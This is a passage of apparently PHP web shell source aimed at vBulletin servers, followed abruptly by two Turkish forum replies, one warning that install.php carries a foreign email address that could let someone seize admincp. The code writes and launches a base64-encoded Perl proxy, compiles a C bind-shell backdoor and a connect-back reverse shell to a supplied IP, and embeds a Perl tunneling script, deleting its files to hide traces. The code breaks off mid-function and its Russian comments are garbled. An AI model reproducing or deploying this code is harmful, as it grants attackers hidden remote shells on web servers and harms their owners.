RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
if(is_writable("/tmp")){
$fp=fopen("/tmp/vb_perl_proxy.pl","w");
fwrite($fp,base64_decode($perl_proxy_scp));
passthru("nohup perl /tmp/vb_perl_proxy.pl $port &");
unlink("/tmp/vb_perl_proxy.pl");
}else{
if(is_writable(".")){
mkdir(".vb_proxy_tmp");
$fp=fopen(".vb_proxy_tmp/vb_perl_proxy.pl","w");
fwrite($fp,base64_decode($perl_proxy_scp));
passthru("nohup perl .vb_proxy_tmp/vb_perl_proxy.pl $port &");
unlink(".vb_proxy_tmp/vb_perl_proxy.pl");
rmdir(".vb_proxy_tmp");
}
}
$show_ps="1";
}#end of start perl_proxy
if($_POST['c_bd']){
$port=$_POST['port'];
$c_bd_scp = "#define PORT $port
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
int main ()
{
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl(\"/bin/sh\",\"sh\",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}
";
if(is_writable("/tmp")){
$fp=fopen("/tmp/vb_c_bd.c","w");
fwrite($fp,"$c_bd_scp");
passthru("gcc /tmp/vb_c_bd.c -o /tmp/vb_bd");
passthru("nohup /tmp/vb_bd &");
unlink("/tmp/vb_c_bd.c");
unlink("/tmp/vb_bd");
}else{
if(is_writable(".")){
mkdir(".vb_bd_tmp");
$fp=fopen(".vb_bd_tmp/vb_c_bd.c","w");
fwrite($fp,"$c_bd_scp");
passthru("gcc .vb_bd_tmp/vb_c_bd.c -o .vb_bd_tmp/vb_bd");
passthru("nohup .vb_bd_tmp/vb_bd &");
unlink(".vb_bd_tmp/vb_bd");
unlink(".vb_bd_tmp/vb_c_bd.c");
rmdir(".vb_bd_tmp");
}
}
$show_ps="1";
}#end of c bd
if($_POST['bc_c']){ # nc -l -p 4500
$port_c = $_POST['port_c'];
$ip=$_POST['ip'];
$bc_c_scp = "#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
int fd, sock;
int port = $port_c;
struct sockaddr_in addr;
char mesg[] = \"::Connect-Back Backdoor:: CMD: \";
char shell[] = \"/bin/sh\";
int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, \" %s <ip> \", argv[0]);
exit(0); }
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, \"in.telnetd\", 0);
close(fd);
return 1;
}
";
if(is_writable("/tmp")){
if(file_exists("/tmp/vb_c_bc_c.c")){unlink("/tmp/vb_c_bc_c.c");}
if(file_exists("/tmp/vb_c_bc_c.c")){unlink("/tmp/vb_c_bc");}
$fp=fopen("/tmp/vb_c_bc_c.c","w");
$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
fwrite($fp,"$bc_c_scp");
passthru("gcc /tmp/vb_c_bc_c.c -o /tmp/vb_bc_c");
passthru("nohup /tmp/vb_bc_c $ip &");
unlink("/tmp/vb_bc_c");
unlink("/tmp/vb_bc_c.c");
}else{
if(is_writable(".")){
mkdir(".vb_bc_c_tmp");
$fp=fopen(".vb_bc_c_tmp/vb_c_bc_c.c","w");
$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
fwrite($fp,"$bc_c_scp");
passthru("gcc .vb_bc_c_tmp/vb_c_bc_c.c -o .vb_bc_c_tmp/vb_bc_c");
passthru("nohup .vb_bc_c_tmp/vb_bc_c $ip &");
unlink(".vb_bc_c_tmp/vb_bc_c.c");
unlink(".vb_bc_c_tmp/vb_bc_c");
rmdir(".vb_bc_c_tmp");
}
}
$show_ps="1";
}#end of back connect C
if($_POST['datapipe_pl']){
$port_2=$_POST['port_2'];
$port_3=$_POST['port_3'];
$ip=$_POST['ip'];
$datapipe_pl = "
#!/usr/bin/perl
# coded by CuTTer (rus hacker)
use IO::Socket;
use POSIX;
\$localport=$port_2;
\$host=\"$ip\";
\$port=$port_3;
\$daemon=1;
\$DIR = undef;
## �������� ��� ������� (1-��, 0-���)
\$log=0;
\$| = 1;
if (\$daemon){
print \"3anycKaeM daemon\n\";
\$pid = fork;
exit if \$pid;
die \"Couldn't fork: \$!\" unless defined(\$pid);
POSIX::setsid() or die \"Can't start a new session: \$!\";
}
%o = ('port' => \$localport,
'toport' => \$port,
'tohost' => \$host);
\$ah = IO::Socket::INET->new(
'LocalPort' => \$localport,
'Reuse' => 1,
'Listen' => 10)
|| die \"������ ������� ����� ��� ����������: \$!\";
print \"�������� ���������� �����.\n\" if \$log;
\$SIG{'CHLD'} = 'IGNORE';
\$num = 0;
while (1) {
\$ch = \$ah->accept();
if (!\$ch) {
print STDERR \"�������� ��������� accept: \$!\n\";
next;
}
printf(\"����� ������: host %s, port %s.\n\",
\$ch->peerhost(), \$ch->peerport()) if \$log;
++\$num;
\$pid = fork();
if (!defined(\$pid)) {
print STDERR \"���������� ��������� fork: \$!\n\";
} elsif (\$pid == 0) {
## ����� �������
\$ah->close();
Run(\%o, \$ch, \$num);
} else {
print \"Parent: Fork ������ �������, ��������� �����.\n\" if \$log;
\$ch->close();
}
}
sub Run {
my(\$o, \$ch, \$num) = @_;
my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
'PeerPort' => \$o->{'toport'});
print(\"Child: ������ �������� �� \$o->{'tohost'}, ���� \$o->{'toport'}.\n\") if \$log;
if (!\$th) {
printf STDERR (\"Child: ������� �������� �� %s, ���� %s.\n\",
\$o->{'tohost'}, \$o->{'toport'});
exit 0;
}
my \$fh;
if (\$o->{'dir'}) {
\$fh = Symbol::gensym();
open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
or die \"Child: �������� �������� ��� ����� \$o->{'dir'}/tunnel\$num.log: \$!\";
}
\$ch->autoflush();
\$th->autoflush();
while (\$ch || \$th) {
print \"Child: �������� ����.\n\" if \$log;
my \$rin = \"\";
vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
vec(\$rin, fileno(\$th), 1) = 1 if \$th;
my(\$rout, \$eout);
select(\$rout = \$rin, undef, \$eout = \$rin, 120);
if (!\$rout && !\$eout) {
print STDERR \"Child: ������ Timeout.\n\";
}
my \$cbuffer = \"\";
my \$tbuffer = \"\";
if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
print \"Child: ���� ������ �� �������.\n\" if \$log;
myolgunmadak
New Member
ben Türküm (My From Is Turkey)
cyber.microp
New Member
birader tamam türksün ama adamlar install.php içinde başka bir mail adresi vermilşler yani admincp yi ele geçirebilirler rahatça ne malum diğer dosyalarda sorun olmayacağı